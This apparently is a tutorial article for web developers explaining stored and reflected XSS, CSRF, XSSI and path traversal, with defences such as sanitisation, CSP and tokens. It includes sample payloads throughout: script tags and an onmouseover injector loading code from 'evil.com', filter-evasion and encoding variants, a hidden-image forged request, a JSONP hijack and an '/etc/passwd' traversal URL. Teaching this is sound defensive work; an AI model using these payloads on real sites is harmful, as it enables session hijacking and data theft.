What is a Cross Site Scripting (XSS) attack?

This is easier explained by reading it backwards. It is an attack which consists in tricking the victim into running a script which is stored across in another site. This is typically the attacker’s own site or a third party they have hacked and are using without the owner knowing.

To trick the victim, the attacker injects a snippet of malicious code somewhere where the unwary user will run it; this snippet will either download the malicious code from the attacker’s server, or redirect the user to it. The attacker can inject the snippet either by submitting it to sites that accept user content like comments, etc (stored XSS), or by creating malicious URLs which when browsed to, trigger the attack (reflected XSS).

How serious is the threat?

It’s very serious, probably the biggest vulnerability on the web. But not only; many desktop apps nowadays are nothing more than a (Chrome) web browser disguised as an app, so they are also vulnerable. Apps like WhatsApp, Slack, code editors like Visual Studio Code, Google Play App, the list is indeed very long.

How do you prevent XSS?

As a user your only, limited, defence is to be careful what links you click on. But the onus is really on engineers to ensure the systems they design do not allow injection of malicious code. This is achieved by sanitising any content uploaded by users, as well as other measures. If you are the owner of a website that would be your responsability.

What does malicious XSS code look like?

Simple XSS code examples use tricks to include a script tag with the code that does the damage.

<script src="http://evil.com/oh-dear.js"></script> Just

an innocent comment on a message board...

How comes web browsers allow code from third parties to run on MY website?

From the early days of the web, development has been driven by advertising (in the form of banner ads, originally). This is implemented by inserting code from the advertising networks in people’s websites, so for the web to be successful it was seen as essential that browsers didn’t block scripts from third parties. Google Analytics is probably the most universally downloaded script in the whole internet.

And back in the days of HTTP 1 people were also keen to host scripting libraries like jQuery on shared hosts, hoping that the user had already downloaded them from another site and therefore wouldn’t need to do so again.

And multinational websites such as Amazon want to share their assets between amazon.de, amazon.com, amazon.co.jp … And while developing, site owners want to download assets from the live site (say www.example.com) while developing on a subdomain (new-version.example.com)

So there are good reasons for allowing Cross-Origin Resource Sharing (CORS), which is the technical name for it, and why browser manufacturers took no steps to disable it until very recently.

What they did take care of was providing a way for site owners to protect copyright on their assets, so that third parties cannot include your scripts or fonts or JSON data in their site. This is achieved with the Access-Control-Allow-Origin and related CORS headers. Although third parties can easily download those assets and then host them somewhere out of your reach.

Are there any server headers that can help with XSS?

Eventually browser manufacturers came around the idea that maybe they should try and protect their users from XSS, and the Content Security Policy (CSP) was introduced. This does exactly what you expect - it allows you to say, for example, “only load css from these domains, JS from those” and so on. Sadly it took them a while and only the latest browsers are compliant. Not IE11 for example. But it’s definitively a step in the right direction.

You can find out more about CSP, including supported browsers, on this reference site by Foundeo

Types of XSS: Stored XSS and Reflected XSS

In stored XSS the attacker finds a way to inject malicius code in a site you visit - for example a news site, an illegal download site, or often a banner ad. In reflected XSS the attacker creates a link which, when you click, results in you infecting yourself.

Stored XSS: File Upload displayed in an iframe

When a site allows users to upload files which are then displayed to other users in an iframe, an attacker could upload an HTML file with a script tag inside

This is my cool HTML page <script><!--
... here I can do evil things ...
--></script>

This is a relatively simple attack to mitigate. Since you control the server where the malicious code is stored, you can simply make sure the uploaded documents are saved on a separate subdomain, say user-content.example.com, and then it won’t have access to content on the main domain.

Reflected XSS

The classic reflected XSS attack tries to add a script tag to a url:

https://example.com/<script>..evil.. </script>

Of course the attack will never be so blatant, but will use the browsers’ built-in ability to do substitutions for special character encoding. Nowadays browsers protect against such attacks, but it’s interesting to see what they are like anyway

example.com/<scritpt>
blatant
example.com/%3cscritpt%3e
URL % encoding
example.com/%253cscritpt%253e
double URL % encoding
example.com/%c0%bcscript%c0%be
bad UTF-8 encoding
example.com/%26lt;script%26gt;
HTML encoding
example.com/%26amp;lt;script%26amp;gt;
double HTML encoding
example.com/\074script\076
ASCII encoding
example.com/\x3cscritpt\x3E
ASCII encoding with hexadecimal
example.com/\u003cscritpt\u003e
ASCII encoding with unicode
example.com/+AD4-script+ADw-
C style encoding

Stored XSS: Simple attacks with script tags and HTML sanitasion

The simplest XSS attack below may work, if the site was built by hobbysts or amateurs. But a simple regular expression is usually enough to stop that.

Great site! <script src="http://evil.com/xss.js"></script>

Regular expressions are not the best approach though. One reason is that you can easily match valid HTML, but attackers often get around them by submitting invalid HTML, taking advantage of the fact browsers are very forgiving. So they could submit the following

Great site! <a href="<script src=" http: evil.com xss.js"></a>

Or use hidden, non-rendered characters that can break a regular expression but are ignored by many browsers

Great site! <scr\0ipt src="http://evil.com/xss.js"></scr\0ipt>

Or even simply upper case letters

Great site! <SCRIPT SRC="http://evil.com/xss.js"></SCRIPT>

The best approach to sanitasion is:

  • parse the input into a DOM tree which is not rendered in the page
  • have a white list of allowed tags and attributed, and go through every node of rendered DOM, deleting what is not the whitelist
  • make sure any URLs and CSS attributes that are allowed are strictly sanitased. Careful of URLs using the javascript: protocols

Using HTML attributes for xss attacks

One doesn’t necessarily need a script tag to store XSS - one can simply have some javascript in a tag attribute. The following would be triggered when someone moves the mouse over the comment

<p onmouseover="var d=document;var s=d.createElement('script');s.src='http://evil.com/xss.js';d.appendChild(s);">Great site!</p>

Stored XSS: Using CSS attributes for xss attacks

If a site allows user to, say, choose a color for the text of the comments, you could submit something like red;" onmouseover="...evil JS..." and then you can have


<!-- what the coder expected the final results to be when
they built the site -->
<p style="color:SOME_CUSTOM_COLOR;">My Home Page</p>

<!-- what the attacker injected -->
<p style="color:red;" onmouseover="...evil JS...">My Home Page</p>

Stored XSS: Javascript

A typical XSS fragment for a site that allows user submissions:

blah <span style='display:none'>"
+ (...evil js..., "")
+ "</span> nothing to see here

That relies on the fact that the code will be inserted into the page via JS, with code such as

$el.innerHTML = "blah <span style='display:none'>"
+ (...evil js..., "")
+ " nothing to see here";

The not so common comma operator at (...evil js..., "") returns the item on the right. The comma operator is often used when golfing / minifying, but not often when hand coding because of its unreadability. It simply executes the item on the left then ignores it and returns the one on the right: var a = (1, 2); console.log(a); //2.

So it is important to escape strings that will be handled by JS with \x27 for single quotes and \x22 for doubles.

Reflected XSS: AJAX

Sometimes a site runs a fragment of a paragraph. An example is Google Translate: https://translate.google.com/#en/de/...evil js..., where “…evil js…” could be <script>evil js</script> and may be inserted in the translation box and translated, if the site isn’t careful (obviously Google are). The way to handle this is to escape the <> characters with \x3c\x3e. It is also important to set the charset of your document with Content-Type: text/html; charset=utf-8, to avoid the browser interpreting as utf-7, where +ADw- and +AD4- are the encodings for < and >.

Cross-Site Request Forgery (XSRF)

This happens when an attacker stores some code in a page that requests a resource (often an image, but could be the favicon too for example) from a separate third party site, for example your bank, or Facebook (unlikely they don’t protect themselves from such attacks, though). If you are already logged in the third party site, the browser will send cookies and everything else to that site. So you could have an exploit such as

An innocent message, la la
<img
    <!-- attacker hides the exploit -->
    style="display:none"

    <!-- this is a (fake) command which the user needs
    to be logged in to run; but if the user IS already logged in,
    then it WILL be run, as the cookies will be sent. It doesn't matter
    that the response is not an image, because of the display:none -->
    src="http://facebook.com/post/?msg=blah"
    >

To mitigate against those attacks, for a start make sure you use POST and not GET in your request. With your POST request, send a token with a timestamp, and expire login if the timestamp is too old (old = a few minutes). Generate a new token for every request. Maybe even generate different tokens for different types of requests.

Cross Site Script Inclusion (XSSI)

In this case the attacker includes your script in their page. That way they can read any variables accessible to your script, since the browser doesn’t distinguish between the two environments. The simplest example is if someone has sensitive data simply embedded in the JS

// your_script.js
var privateKey = "-----BEGIN RSA PRIVATE KEY-----" // etc

// attacker_page.html
<!doctype HTML>
<html>
<head>
    <script src="your_script.js"></script>
    <script>alert(privateKey)</script>
...
</head></html>

Another source of attacks is JSONP, as an attacker can simply override the callback function


// attacker_page.html
<script>
    var my_callback = function (my_leaked_data) {
        doEvil(JSON.stringify(my_leaked_data));
    };
</script>
<script src="https://your_site/p?jsonp=my_callback"></script>

The defence is simply not to put sensitive information inside JS or JSONP responses. Other steps are the same as for XSRF (use POST, use tokens), and make scripts non-executables by adding prefixes such as ])}while(1);</x>

Path Traversal

The classic exploit which tries to trick the server into serving files outside the server root.

https://example.com/../../../../../../../etc/passwd

Few servers are configured by default to allow that, but be careful with customising configurations. Also, careful in allowing users to chose strings such as brett/../../ as username.

Conclusion

This is just scratching the surface of XSS and related attacks; it is a specialist fields which, however, every front end developer should at least be familiar with.